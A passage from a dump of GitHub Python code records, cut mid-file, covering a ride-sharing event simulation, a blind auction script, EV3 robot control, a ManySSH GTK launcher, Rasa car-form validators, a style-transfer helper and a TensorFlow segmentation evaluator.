list[Event]\n        \"\"\"\n        raise NotImplementedError(\"Implemented in a subclass\")\n\n\nclass RiderRequest(Event):\n    \"\"\"A rider requests a driver.\n\n    === Attributes ===\n    @type rider: Rider\n        The rider.\n    \"\"\"\n    def __init__(self, timestamp, rider):\n        \"\"\"Initialize a RiderRequest event.\n\n        @type self: RiderRequest\n        @type rider: Rider\n        @rtype: None\n        \"\"\"\n        super().__init__(timestamp)\n        self.rider = rider\n\n    def do(self, dispatcher, monitor):\n        \"\"\"Assign the rider to a driver or add the rider to a waiting list.\n        If the rider is assigned to a driver, the driver starts driving to\n        the rider.\n\n        Return a Cancellation event. 
If the rider is assigned to a driver,\n        also return a Pickup event.\n\n        @type self: RiderRequest\n        @type dispatcher: Dispatcher\n        @type monitor: Monitor\n        @rtype: list[Event]\n        \"\"\"\n        monitor.notify(self.timestamp, RIDER, REQUEST,\n                       self.rider.identifier, self.rider.origin)\n\n        events = []\n        # assign a driver if one is available, else put the rider onto\n        # the waiting list\n        driver = dispatcher.request_driver(self.rider)\n        # if there is a driver\n        if driver is not None:\n            # find how long it'll take to get to the rider\n            travel_time = driver.start_drive(self.rider.origin)\n            # add a Pickup event (pickup time, rider and driver) to the event list\n            events.append(Pickup(self.timestamp + travel_time, self.rider,\n                                 driver))\n        # add a Cancellation event for the time the rider will cancel\n        events.append(Cancellation(self.timestamp + self.rider.patience,\n                                   self.rider))\n\n        return events\n\n    def __str__(self):\n        \"\"\"Return a string representation of this event.\n\n        @type self: RiderRequest\n        @rtype: str\n\n        >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n        >>> r1 = RiderRequest(3, rider)\n        >>> print(r1)\n        3 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Request a driver\n        >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n        >>> r2 = RiderRequest(0, rider)\n        >>> print(r2)\n        0 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Request a driver\n        \"\"\"\n        return \"{} -- {}: Request a driver\".format(self.timestamp, self.rider)\n\n\nclass DriverRequest(Event):\n    \"\"\"A driver requests a rider.\n\n    === Attributes ===\n    @type driver: Driver\n        The driver.\n    \"\"\"\n\n    def __init__(self, timestamp, driver):\n        \"\"\"Initialize a DriverRequest event.\n\n        @type self: DriverRequest\n        @type driver: Driver\n        @rtype: None\n        \"\"\"\n        super().__init__(timestamp)\n        self.driver = driver\n\n    def do(self, dispatcher, monitor):\n        \"\"\"Register the driver, if this is the first request, and\n        assign a rider to the driver, if one is available.\n\n        If a rider is available, return a Pickup event.\n\n        @type self: DriverRequest\n        @type dispatcher: Dispatcher\n        @type monitor: Monitor\n        @rtype: list[Event]\n\n        Writing multiple examples for the DriverRequest class is not feasible because it would require the\n        initialization of a monitor and a dispatcher. However, it is not sufficient to just initialize these objects\n        without relevant driver and rider data, and since it is a simulation, we would not get a good understanding of\n        how the DriverRequest interacts with and spawns other relevant Events. 
Furthermore, these examples add\n        very little value for testing the functionality of this method because the method itself is dependent on\n        helper methods that will have already been tested.\n        \"\"\"\n        # Notify the monitor about the request.\n        monitor.notify(self.timestamp, DRIVER, REQUEST,\n                       self.driver.identifier, self.driver.location)\n        events = []\n        # Request a rider from the dispatcher.\n        rider = dispatcher.request_rider(self.driver)\n        # If there is one available, the driver starts driving towards the rider\n        if rider is not None:\n            # time taken to drive to pick up location\n            travel_time = self.driver.start_drive(rider.origin)\n            # the method returns a Pickup event for when the driver reaches the rider\n            events.append(Pickup(self.timestamp + travel_time, rider,\n                                 self.driver))\n        return events\n\n    def __str__(self):\n        \"\"\"Return a string representation of this event.\n\n        @type self: DriverRequest\n        @rtype: str\n\n        >>> d1 = Driver('Sam', Location(1,1), 2)\n        >>> dr = DriverRequest(3, d1)\n        >>> print(dr)\n        3 -- ID: Sam, Location: (1,1), Speed: 2: Request a rider\n        >>> d2 = Driver('boo', Location(1,1), 2)\n        >>> dz = DriverRequest(0, d2)\n        >>> print(dz)\n        0 -- ID: boo, Location: (1,1), Speed: 2: Request a rider\n        \"\"\"\n        return \"{} -- {}: Request a rider\".format(self.timestamp, self.driver)\n\n\nclass Cancellation(Event):\n    \"\"\" Cancel a rider's request.\n\n    === Attributes ===\n    @param Rider rider: waiting rider requesting a ride\n    \"\"\"\n\n    def __init__(self, timestamp, rider):\n        \"\"\"\n        Initialize a cancellation event.\n\n        @param Cancellation self: this Cancellation event\n        @param Rider rider: waiting rider requesting a ride\n        @rtype: None\n        \"\"\"\n        super().__init__(timestamp)\n        self.rider = rider\n\n    def __str__(self):\n        \"\"\"Return a string representation of this cancellation event.\n\n        @type self: Cancellation\n        @rtype: str\n\n        >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n        >>> r1 = Cancellation(8, rider)\n        >>> print(r1)\n        8 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Cancellation by rider\n        >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n        >>> r2 = Cancellation(0, rider)\n        >>> print(r2)\n        0 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, Patience: 3: Cancellation by rider\n        \"\"\"\n        return \"{} -- {}: Cancellation by rider\".format(self.timestamp,\n                                                        self.rider)\n\n    def do(self, dispatcher, monitor):\n        \"\"\"If a rider's pickup time is greater than the rider's patience then\n        change the status of rider from waiting to cancelled.\n\n        Don't schedule any future events.\n\n        @type self: Cancellation\n        @type dispatcher: Dispatcher\n        @type monitor: Monitor\n        @rtype: list[Event]\n\n        Writing multiple examples for the Cancellation class is not feasible because it would require the\n        initialization of a monitor and a dispatcher. However, it is not sufficient to just initialize these objects\n        without relevant driver and rider data, and since it is a simulation, we would not get a good understanding of\n        how the Cancellation class interacts with and spawns other relevant Events. 
Furthermore, these examples add\n        very little value for testing the functionality of this method because the method itself is dependent on\n        helper methods that will have already been tested.\n        \"\"\"\n\n        # Notify the monitor about the request\n        monitor.notify(self.timestamp, RIDER, CANCEL, self.rider.identifier, self.rider.origin)\n\n        events = []\n        # Check whether rider is satisfied.\n        if self.rider not in dispatcher.rider[SATISFIED]:\n            # If not satisfied, change status to cancelled and cancel ride.\n            self.rider.status = CANCELLED\n            dispatcher.cancel_ride(self.rider)\n        return events\n\n\nclass Pickup(Event):\n    \"\"\"\n    A pickup event.\n\n    === Attributes ===\n    @param Rider rider: rider waiting to be picked up\n    @param Driver driver: driver picking up rider\n    \"\"\"\n\n    def __init__(self, timestamp, rider, driver):\n        \"\"\"\n        Initialize a Pickup event.\n\n        @param Pickup self: this pickup event\n        @param int timestamp: time at which driver will pick up rider\n        @param Rider rider: rider waiting to be picked up\n        @param Driver driver: driver picking up rider\n        @rtype: None\n        \"\"\"\n        super().__init__(timestamp)\n        self.rider, self.driver = rider, driver\n\n    def __str__(self):\n        \"\"\"\n        Return a string representation of this Pickup Event.\n\n        @param Pickup self: This pickup event\n        @rtype: str\n\n        >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n        >>> d1 = Driver('Sam', Location(1,1), 2)\n        >>> p = Pickup(4, rider, d1)\n        >>> print(p)\n        4 -- ID: Sam, Location: (1,1), Speed: 2 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, \\\nPatience: 3: Pick up time by driver of rider\n        >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n        >>> d2 = Driver('boo', Location(1,1), 2)\n        >>> p2 = Pickup(10, rider_z, d2)\n        >>> print(p2)\n        10 -- ID: boo, Location: (1,1), Speed: 2 -- ID: eggshells, Origin: (0,2), Destination: (3,2), Status: waiting, \\\nPatience: 1: Pick up time by driver of rider\n        \"\"\"\n\n        return \"{} -- {} -- {}: Pick up time by driver of rider\".format(\n            self.timestamp, self.driver, self.rider)\n\n    def do(self, dispatcher, monitor):\n        \"\"\"\n        Set the driver's location to the rider's location.\n\n        If the rider is still waiting, the ride starts and the driver's\n        destination becomes the rider's destination.\n        Schedule a dropoff event for the time they will arrive at the rider's\n        destination. Rider becomes satisfied.\n\n        If the rider has cancelled, the driver becomes idle and a new event is\n        scheduled for the driver to request a rider.\n\n        @param Pickup self: this Pickup event.\n        @param Dispatcher dispatcher:\n        @param Monitor monitor:\n        @rtype: list[Event]\n\n        Writing multiple examples for the Pickup class is not feasible because it would require the\n        initialization of a monitor and a dispatcher. However, it is not sufficient to just initialize these objects\n        without relevant driver and rider data, and since it is a simulation, we would not get a good understanding of\n        how the Pickup class interacts with and spawns other relevant Events. 
Furthermore, these examples add\n        very little value for testing the functionality of this method because the method itself is dependent on\n        helper methods that will have already been tested.\n\n        \"\"\"\n        # End the drive to the pickup location.\n        self.driver.end_drive()\n\n        # Notify the monitor about both the driver's and rider's pickup event.\n        monitor.notify(self.timestamp, RIDER, PICKUP, self.rider.identifier, self.rider.destination)\n        monitor.notify(self.timestamp, DRIVER, PICKUP, self.driver.identifier, self.driver.location)\n\n        events = []\n        # If rider has not cancelled\n        if self.rider not in dispatcher.rider[CANCELLED]:\n            # Get travel time and start the ride\n            travel_time = self.driver.start_ride(self.rider)\n            # This creates a dropoff event for the rider\n            events.append(Dropoff(self.timestamp + travel_time, self.rider, self.driver))\n            # Rider is now satisfied as the ride has successfully begun.\n            self.rider.status = SATISFIED\n            dispatcher.end_successful_ride(self.rider)\n\n        # If rider has cancelled, driver will put in a new request\n        else:\n            events.append(DriverRequest(self.timestamp, self.driver))\n\n        return events\n\n\nclass Dropoff(Event):\n    \"\"\"\n    A dropoff event.\n\n    === Attributes ===\n    @param Rider rider: rider being dropped off\n    @param Driver driver: driver dropping off rider\n    \"\"\"\n\n    def __init__(self, timestamp, rider, driver):\n        \"\"\"\n        Initialize a dropoff event.\n\n        @param Dropoff self: this Dropoff event\n        @param int timestamp: time at which rider was dropped off\n        @param Rider rider: rider being dropped off\n        @param Driver driver: driver dropping off rider\n        @rtype: None\n        \"\"\"\n        super().__init__(timestamp)\n        self.rider, self.driver = rider, driver\n\n    def __str__(self):\n        \"\"\"\n        Return a string representation of this Dropoff event.\n\n        @param Dropoff self: this dropoff event\n        @rtype: str\n\n        >>> rider = Rider('xyz', Location(1, 2), Location(3, 3), 3)\n        >>> d1 = Driver('Sam', Location(1,1), 2)\n        >>> d = Dropoff(4, rider, d1)\n        >>> print(d)\n        4 -- ID: Sam, Location: (1,1), Speed: 2 -- ID: xyz, Origin: (1,2), Destination: (3,3), Status: waiting, \\\nPatience: 3: Dropoff time by driver of rider\n        >>> rider_z = Rider('eggshells', Location(0, 2), Location(3, 2), 1)\n        >>> d2 = Driver('boo', Location(1,1), 2)\n        >>> p2 = Dropoff(10, rider_z, d2)\n        >>> print(p2)\n        10 -- ID: boo, Location: (1,1), Speed: 2 -- ID: eggshells, Origin: (0,2), Destination: (3,2), Status: waiting, \\\nPatience: 1: Dropoff time by driver of rider\n        \"\"\"\n\n        return \"{} -- {} -- {}: Dropoff time by driver of rider\".format(self.timestamp, self.driver, self.rider)\n\n    def do(self, dispatcher, monitor):\n        \"\"\"\n        Set the driver's location to the rider's destination.\n\n        Change status of rider to satisfied.\n\n        Driver becomes idle and requests a new rider.\n\n        @type self: Dropoff\n        @type dispatcher: Dispatcher\n        @type monitor: Monitor\n        @rtype: list[Event]\n\n        Writing multiple examples for the Dropoff class is not feasible because it would require the\n        initialization of a monitor and a dispatcher. However, it is not sufficient to just initialize these objects\n        without relevant driver and rider data, and since it is a simulation, we would not get a good understanding of\n        how the Dropoff class interacts with and spawns other relevant Events. 
Furthermore, these examples add\n        very little value for testing the functionality of this method because the method itself is dependent on\n        helper methods that will have already been tested.\n        \"\"\"\n\n        # End the ride and arrive at rider's destination.\n        self.driver.end_ride()\n\n        # Notify monitor about Dropoff event.\n        monitor.notify(self.timestamp, DRIVER, DROPOFF,\n                       self.driver.identifier, self.driver.location)\n\n        # Once the ride is successful, driver will put in a new request\n        events = [DriverRequest(self.timestamp, self.driver)]\n        dispatcher.end_successful_ride(self.rider)\n        return events\n\n\ndef create_event_list(filename):\n    \"\"\"Return a list of Events based on raw list of events in <filename>.\n\n    Precondition: the file stored at <filename> is in the format specified\n    by the assignment handout.\n\n    @param filename: str\n        The name of a file that contains the list of events.\n    @rtype: list[Event]\n\n    No examples are provided as this method deals with opening a file.\n    \"\"\"\n    events = []\n\n    # Read through file, strip white spaces and properly format Driver and Rider requests\n    # as a list of events.\n\n    with open(filename, \"r\") as file:\n        for line in file:\n            line = line.strip()\n\n            if not line or line.startswith(\"#\"):\n                continue\n\n            tokens = line.split(\" \")\n            timestamp = int(tokens[0])\n            event_type = tokens[1]\n\n            if event_type == \"DriverRequest\":\n                identifier = tokens[2]\n                location_ = deserialize_location(tokens[3])\n                speed = int(tokens[4])\n                driver = Driver(identifier, location_, speed)\n                event_obj = DriverRequest(timestamp, driver)\n                events.append(event_obj)\n\n            elif event_type == \"RiderRequest\":\n                ident = tokens[2]\n                origin = deserialize_location(tokens[3])\n                destination = deserialize_location(tokens[4])\n                patience = int(tokens[5])\n                rider = Rider(ident, origin, destination, patience, status=WAITING)\n                event_obj = RiderRequest(timestamp, rider)\n                events.append(event_obj)\n    return events\n","repo_name":"uamarasinghe/ride_sharing_simulation","sub_path":"event.py","file_name":"event.py","file_ext":"py","file_size_in_byte":21330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11085585442","text":"from replit import clear\nimport art\n\nprint(art.logo)\nentries = {}\ncontinueBid = \"yes\"\n\nwhile continueBid == \"yes\":\n    name = input(\"What is your name? \\n\")\n    bid = int(input(\"What's your bid? \\n$\"))\n    optionNext = input(\"Are there other bidders? 
Type 'yes' or 'no' \\n\").lower()\n entries[name] = bid\n clear()\n print(entries)\n if optionNext == \"no\":\n continueBid = \"no\"\n\nscore = 0\nfor person in entries:\n if entries[person] > score:\n score = entries[person]\n nameOfPerson = person\n\nprint(f\"Highest bidder is {nameOfPerson} with a bid of ${score}\")\n","repo_name":"kelvin5hart/blind-auction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73188256484","text":"#!/usr/bin/env python3\nfrom ev3dev2.motor import OUTPUT_A, OUTPUT_D, MoveTank,SpeedRPS, follow_for_ms\nfrom ev3dev2.sensor.lego import GyroSensor\nfrom ev3dev2.sensor import INPUT_1\n\n# Instantiate the MoveTank object\ntank = MoveTank(OUTPUT_A, OUTPUT_D)\n\n# Initialize the tank's gyro sensor\ntank.gyro = GyroSensor(INPUT_1)\n\n# Calibrate the gyro to eliminate drift, and to initialize the current angle as 0\ntank.gyro.calibrate()\n\n\n # Follow the target_angle for 4500ms\ntank.follow_gyro_angle(\nkp=11.3, ki=0.05, kd=3.2,\nspeed=SpeedRPS(.5),\ntarget_angle=0,\nfollow_for=follow_for_ms,\nms=4500)\n\ntank.stop()","repo_name":"MasonTrippel/EV3RobotScripts","sub_path":"gyrotest.py","file_name":"gyrotest.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72517264166","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"ksalf\",\n version=\"0.0.2\",\n author=\"Benjamin Haegenlaeuer\",\n author_email=\"benni.haegenlaeuer@outlook.de\",\n description=\"A lightweight webserver implementation [inspired by flask]\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/Haegi/ksalf\",\n packages=setuptools.find_packages(exclude=[\"test\"]),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6',\n)\n","repo_name":"Haegi/ksalf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13300163000","text":"# -*- coding: utf-8 -*-\n\nfrom gi.repository import GLib, Gtk\nfrom manyssh.win import Window\n\nimport json\nimport os\n\n\nclass Application(object):\n \"\"\"\n ManySSH application.\n \"\"\"\n\n def __init__(self, argv, *args, **kwargs):\n \"\"\"\n :param argv: argument list\n :type argv: list of str\n \"\"\"\n\n super(Application, self).__init__(*args, **kwargs)\n\n self.argv = argv\n\n def load_config(self):\n \"\"\" Load configuration. \"\"\"\n\n paths = []\n dirs = list(GLib.get_system_config_dirs())\n dirs.append(GLib.get_user_config_dir())\n\n paths = [\n p\n for p in [\n os.path.join(d, 'manyssh', 'clusters.conf')\n for d in dirs\n ] + ['clusters.conf']\n if os.path.exists(p)\n ]\n\n self.config = {}\n\n for path in paths:\n print('-- Loading configuration: {0}'.format(path))\n with open(path) as f:\n self.config.update(json.load(f))\n\n def parse_commandline(self):\n \"\"\" Parse argument list. 
\"\"\"\n\n if len(self.argv) < 2:\n raise RuntimeError('No cluster specified')\n\n cluster = self.argv[1]\n\n if cluster not in self.config:\n raise RuntimeError('Cluster {0} not found'.format(cluster))\n\n self.hosts = self.config[cluster]\n\n def init_ui(self):\n \"\"\" Initialize user interface. \"\"\"\n\n win = Window(self.hosts)\n win.connect('delete-event', Gtk.main_quit)\n win.show_all()\n\n Gtk.main()\n\n def __call__(self):\n \"\"\" Entry point. \"\"\"\n\n try:\n self.load_config()\n self.parse_commandline()\n self.init_ui()\n\n except RuntimeError as err:\n print('Error: {0}'.format(err))\n return 1\n\n return 0\n","repo_name":"linkdd/manyssh","sub_path":"manyssh/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"1702252033","text":"import cv2\nimport numpy as np\n\n#img = cv2.imread('./golden_gate.jpg')\n\ndef transform(img, net=cv2.dnn.readNetFromTorch('models/eccv16/composition_vii.t7')):\n h, w, c = img.shape\n img = cv2.resize(img, dsize=(500, int(h / w * 500)))\n # (325, 500, 3)\n\n MEAN_VALUE = [103.939, 116.779, 123.680]\n blob = cv2.dnn.blobFromImage(img, mean=MEAN_VALUE)\n\n # (1, 3, 325, 500)\n net.setInput(blob)\n output = net.forward()\n\n output = output.squeeze().transpose((1, 2, 0))\n output += MEAN_VALUE\n\n output = np.clip(output, 0, 255)\n output = output.astype('uint8')\n\n return output","repo_name":"MeoSeon12Jo/naegrimfarm-backend","sub_path":"deep_learning_with_images/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10868212005","text":"from typing import Dict, Text, Any, List, Union\r\n\r\nfrom rasa_sdk import Tracker\r\nfrom rasa_sdk.executor import CollectingDispatcher\r\nfrom rasa_sdk.forms import FormValidationAction\r\nfrom rasa_sdk import utils\r\nfrom knowledgebase.car_knowledgebase import CarKnowledgeBase\r\n\r\nclass ValidateOneDesireForm(FormValidationAction):\r\n\r\n def __init__(self):\r\n self.knowledge_base = CarKnowledgeBase(db='che300', user='root', password='password')\r\n\r\n def name(self) -> Text:\r\n return \"validate_one_desire_car_form\"\r\n\r\n @staticmethod\r\n def car_gear_type_db() -> List[Text]:\r\n \"\"\"Database of supported car gear type.\"\"\"\r\n\r\n return [\r\n \"手动\",\r\n \"自动\"\r\n ]\r\n\r\n @staticmethod\r\n def is_int(string: Text) -> bool:\r\n \"\"\"Check if a string is an integer.\"\"\"\r\n\r\n try:\r\n int(string)\r\n return True\r\n except ValueError:\r\n return False\r\n\r\n async def required_slots(\r\n self,\r\n domain_slots: List[Text],\r\n dispatcher: \"CollectingDispatcher\",\r\n tracker: \"Tracker\",\r\n domain: \"DomainDict\",\r\n ) -> List[Text]:\r\n updated_slots = domain_slots.copy()\r\n car_list = tracker.get_slot('car')\r\n if car_list is None or len(car_list) == 0:\r\n return []\r\n series_name = car_list[0]\r\n green_type_count = await utils.call_potential_coroutine(self.knowledge_base.get_green_type_count(series_name))\r\n if green_type_count <= 1:\r\n # If the car doesn't have a green energy model, no need to ask\r\n updated_slots.remove(\"is_green\")\r\n gear_type_count = await utils.call_potential_coroutine(self.knowledge_base.get_gear_type_count(series_name))\r\n if gear_type_count <= 1:\r\n updated_slots.remove(\"gear_type\")\r\n model_level = tracker.get_slot('model_level')\r\n if model_level and model_level != '无':\r\n 
updated_slots.remove(\"price\")\r\n updated_slots.remove(\"engine_power_kw\")\r\n return updated_slots\r\n\r\n def validate_model_level(\r\n self, value: Text, dispatcher: CollectingDispatcher, tracker: Tracker, domain: Dict\r\n ) -> Dict[Text, Any]:\r\n if \"高\" in value or \"好\" in value:\r\n return {\"model_level\": \"高\"}\r\n elif \"中\" in value or \"一般\" in value or \"普通\" in value:\r\n return {\"model_level\": \"中\"}\r\n elif \"低\" in value or \"差\" in value:\r\n return {\"model_level\": \"低\"}\r\n else:\r\n return {\"model_level\": \"无\"}\r\n\r\n def validate_is_green(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car is_green value.\"\"\"\r\n if value == \"是\":\r\n # validation succeeded, set the value of the \"gear_type\" slot to value\r\n return {\"is_green\": 1}\r\n elif value == \"否\":\r\n return {\"is_green\": 0}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_is_green\")\r\n return {\"is_green\": None}\r\n\r\n def validate_gear_type(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car gear type value.\"\"\"\r\n if value in self.car_gear_type_db():\r\n # validation succeeded, set the value of the \"gear_type\" slot to value\r\n return {\"gear_type\": value}\r\n elif \"自动\" in value:\r\n return {\"gear_type\": \"自动\"}\r\n elif \"手动\" in value:\r\n return {\"gear_type\": \"手动\"}\r\n elif \"都行\" in value or \"随便\" in value or \"无\" in value or \"都可以\" in value:\r\n return {\"gear_type\": \"手动|自动\"}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_gear_type\")\r\n # validation failed, set this slot to None, meaning the\r\n # user will be asked for the slot again\r\n return {\"gear_type\": None}\r\n\r\n def validate_price(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car price range value.\"\"\"\r\n if self.is_int(value) and int(value) > 0:\r\n return {\"price\": int(value)}\r\n else:\r\n dispatcher.utter_message(response=\"utter_wrong_price\")\r\n # validation failed, set slot to None\r\n return {\"price\": None}\r\n\r\n def validate_engine_power_kw(\r\n self,\r\n value: Text,\r\n dispatcher: CollectingDispatcher,\r\n tracker: Tracker,\r\n domain: Dict[Text, Any],\r\n ) -> Dict[Text, Any]:\r\n \"\"\"Validate car engine_power value.\"\"\"\r\n if '大' in value or '好' in value:\r\n # validation succeeded, set the value of the \"cuisine\" slot to value\r\n return {\"engine_power_kw\": \"大\"}\r\n elif '中' in value or '一般' in value:\r\n # validation failed, set this slot to None, meaning the\r\n # user will be asked for the slot again\r\n return {\"engine_power_kw\": \"中\"}\r\n else:\r\n return {\"engine_power_kw\": \"小\"}\r\n","repo_name":"flygan1988/rasa-main","sub_path":"examples/carbot_v2/actions/validate_one_desire_car_form.py","file_name":"validate_one_desire_car_form.py","file_ext":"py","file_size_in_byte":5353,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8495002551","text":"from scipy.stats import crystalball\nimport numpy as np\nimport pandas as pd\nimport uproot\nimport matplotlib.pyplot as plt\nfig, ax = plt.subplots(1, 1)\n\ninput_file = uproot.open(\"trkana.Triggered.root\")\ninput_tree = input_file[\"TrkAnaNeg/trkana\"]\ndf = 
input_tree.pandas.df(flatten = False)\n\nfile2 = uproot.open(\"reco-Delta45-trig.root\")\nRPCReco2 = file2[\"TrkAnaNeg/trkana\"]\ndf2 = RPCReco2.pandas.df(flatten=False)\n\ndframes = [df, df2]\n\nresult = pd.concat(dframes)\n\ndata1 = result[\"deent.mom\"]\ndata = df2[\"deent.mom\"]\n\ny, bins = np.histogram(data, bins=100)\n\nbeta1 = 45\nm1 = 2\n\n# Convert histogram into a classical plot\ndx = bins[1] - bins[0]\n\nx = np.linspace(bins[0]+dx/2, bins[-1]-dx/2, 100)\n\nbeta, m,loc,scale = 1, 10,2,0.05\n#loc shifts the distribution along the x-axis\n#scale stretches the distribution: the pdf is divided by scale, so a larger scale lowers the peak\n#scale can't be negative\n\n\ndef CrystalBall(x,beta1,m1,loc,scale):#,beta2,m2):\n    return (crystalball.pdf(x,beta1,m1,loc,scale)) #+ crystalball.pdf(x,beta2,m2)\n\nx = np.linspace(crystalball.ppf(0.01, beta, m),\n                crystalball.ppf(0.99, beta, m), 100)\nax.plot(x, CrystalBall(x,beta, m,loc,scale))\nplt.xlim(-10,10)\nplt.ylim(-10,10)\n\nplt.xlim(-10,10)\n\nplt.show()","repo_name":"josephinetsai/Mu2e","sub_path":"practicecrystal.py","file_name":"practicecrystal.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34158484776","text":"import os\nimport sys\nimport glob\nimport argparse\nimport shutil\nimport tensorflow as tf\nimport numpy as np\nimport cv2\nimport gc # memory garbage collector\n\n# Silence TensorFlow messages\n#0 = all messages are logged (default behavior)\n#1 = INFO messages are not printed\n#2 = INFO and WARNING messages are not printed\n#3 = INFO, WARNING, and ERROR messages are not printed\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n# workaround for TF1.15 bug \"Could not create cudnn handle: CUDNN_STATUS_INTERNAL_ERROR\"\nos.environ['TF_FORCE_GPU_ALLOW_GROWTH'] = 'true'\n\nimport tensorflow.contrib.decent_q\n\nfrom tensorflow.python.platform import gfile\nfrom keras.preprocessing.image import img_to_array\n\nfrom config import fcn_config as cfg\nfrom config import fcn8_cnn as cnn\n\nDATAS_DIR = cfg.DATASET_DIR\nIMG_TEST_DIR = cfg.dir_test_img\nSEG_TEST_DIR = cfg.dir_test_seg\n\n#purely vectorized Python coding style\ndef softmax_predict(logits):\n\tprediction = tf.nn.softmax(logits, name='prediction')\n\treturn prediction\n\n#C-like coding style\ndef cpp_softmax(inpTens, H, W, Nclass) :\n    result = np.zeros((H,W, Nclass), dtype=\"float32\")\n    iTens= inpTens\n    for r in range(H): # loop on rows\n        for c in range(W): # loop on columns\n            sum = 0.0\n            for d in range(Nclass): # loop on Classes\n                result[r,c,d]=np.exp(iTens[r,c,d])\n                sum = sum + result[r,c,d]\n            for d in range(Nclass): # loop on Classes\n                result[r,c,d]=result[r,c,d]/sum\n    return result\n\n\ndef graph_eval(input_graph_def, input_node, output_node):\n    #Reading images and segmentation labels\n    x_test, y_test, img_file, seg_file= cnn.get_images_and_labels(IMG_TEST_DIR, SEG_TEST_DIR,\n                                                                  cfg.NUM_CLASSES, cfg.WIDTH, cfg.HEIGHT)\n\n    y_pred2 = np.zeros((y_test.shape))\n    y_pred2i = np.zeros((y_test.shape[0],y_test.shape[1],y_test.shape[2]))\n\n    # load graph\n    tf.import_graph_def(input_graph_def,name = '')\n\n    # Get input & output tensors\n    x = tf.compat.v1.get_default_graph().get_tensor_by_name(input_node+':0')\n    y = tf.compat.v1.get_default_graph().get_tensor_by_name(output_node+':0')\n\n    # Create the Computational graph\n    with tf.compat.v1.Session() as sess:\n        sess.run(tf.compat.v1.initializers.global_variables())\n        feed_dict={x: x_test}\n\t\t#y_pred = sess.run(y, feed_dict) # original code\n        logits = sess.run(y, feed_dict) 
# new code\n pred_DB = softmax_predict(logits) #new code\n y_pred = pred_DB.eval() #new code\n ##alternative way to compute softmax in C++ style\n #for i in range(logits.shape[0]):\n # y_pred2[i]= cpp_softmax(logits[i], 224, 224, 12)\n\n\n # Calculate intersection over union for each segmentation class\n y_predi = np.argmax(y_pred, axis=3)\n y_testi = np.argmax(y_test, axis=3)\n print(y_testi.shape,y_predi.shape)\n cnn.IoU(y_testi,y_predi)\n\n ##just to check the cpp_softmax works fine\n #y_pred2i = np.argmax(y_pred2, axis=3)\n #print(y_testi.shape,y_pred2i.shape)\n #cfg.IoU(y_testi,y_pred2i)\n\n print ('FINISHED!')\n return x_test, y_testi, y_predi, y_pred2i, img_file, seg_file\n\n\ndef main(unused_argv):\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = FLAGS.gpu\n input_graph_def = tf.Graph().as_graph_def()\n input_graph_def.ParseFromString(tf.io.gfile.GFile(FLAGS.graph, \"rb\").read())\n\n x_test,y_testi,y_predi,y_pred2i, img_file,seg_file = graph_eval(input_graph_def, FLAGS.input_node, FLAGS.output_node)\n\n '''\n #save some segmented images\n for i in range(len(x_test)):\n k=i\n img_filename = img_file[k].split(\"/\")[-1]\n seg_filename = seg_file[k].split(\"/\")[-1]\n pred_filename= \"pred_\" + seg_filename.split(\"_\")[-1]\n print(img_filename, seg_filename, pred_filename)\n orig_image = (x_test[k]+1.0)*127.5\n gt_image = cnn.give_color_to_seg_img(y_testi[k], cfg.NUM_CLASSES)*255.0\n pred_image = cnn.give_color_to_seg_img(y_predi[k], cfg.NUM_CLASSES)*255.0\n orig_image = np.uint8(orig_image)\n gt_image = np.uint8(gt_image)\n B,G,R = cv2.split(gt_image)\n gt_image = cv2.merge((R,G,B))\n pred_image = np.uint8(pred_image)\n B,G,R = 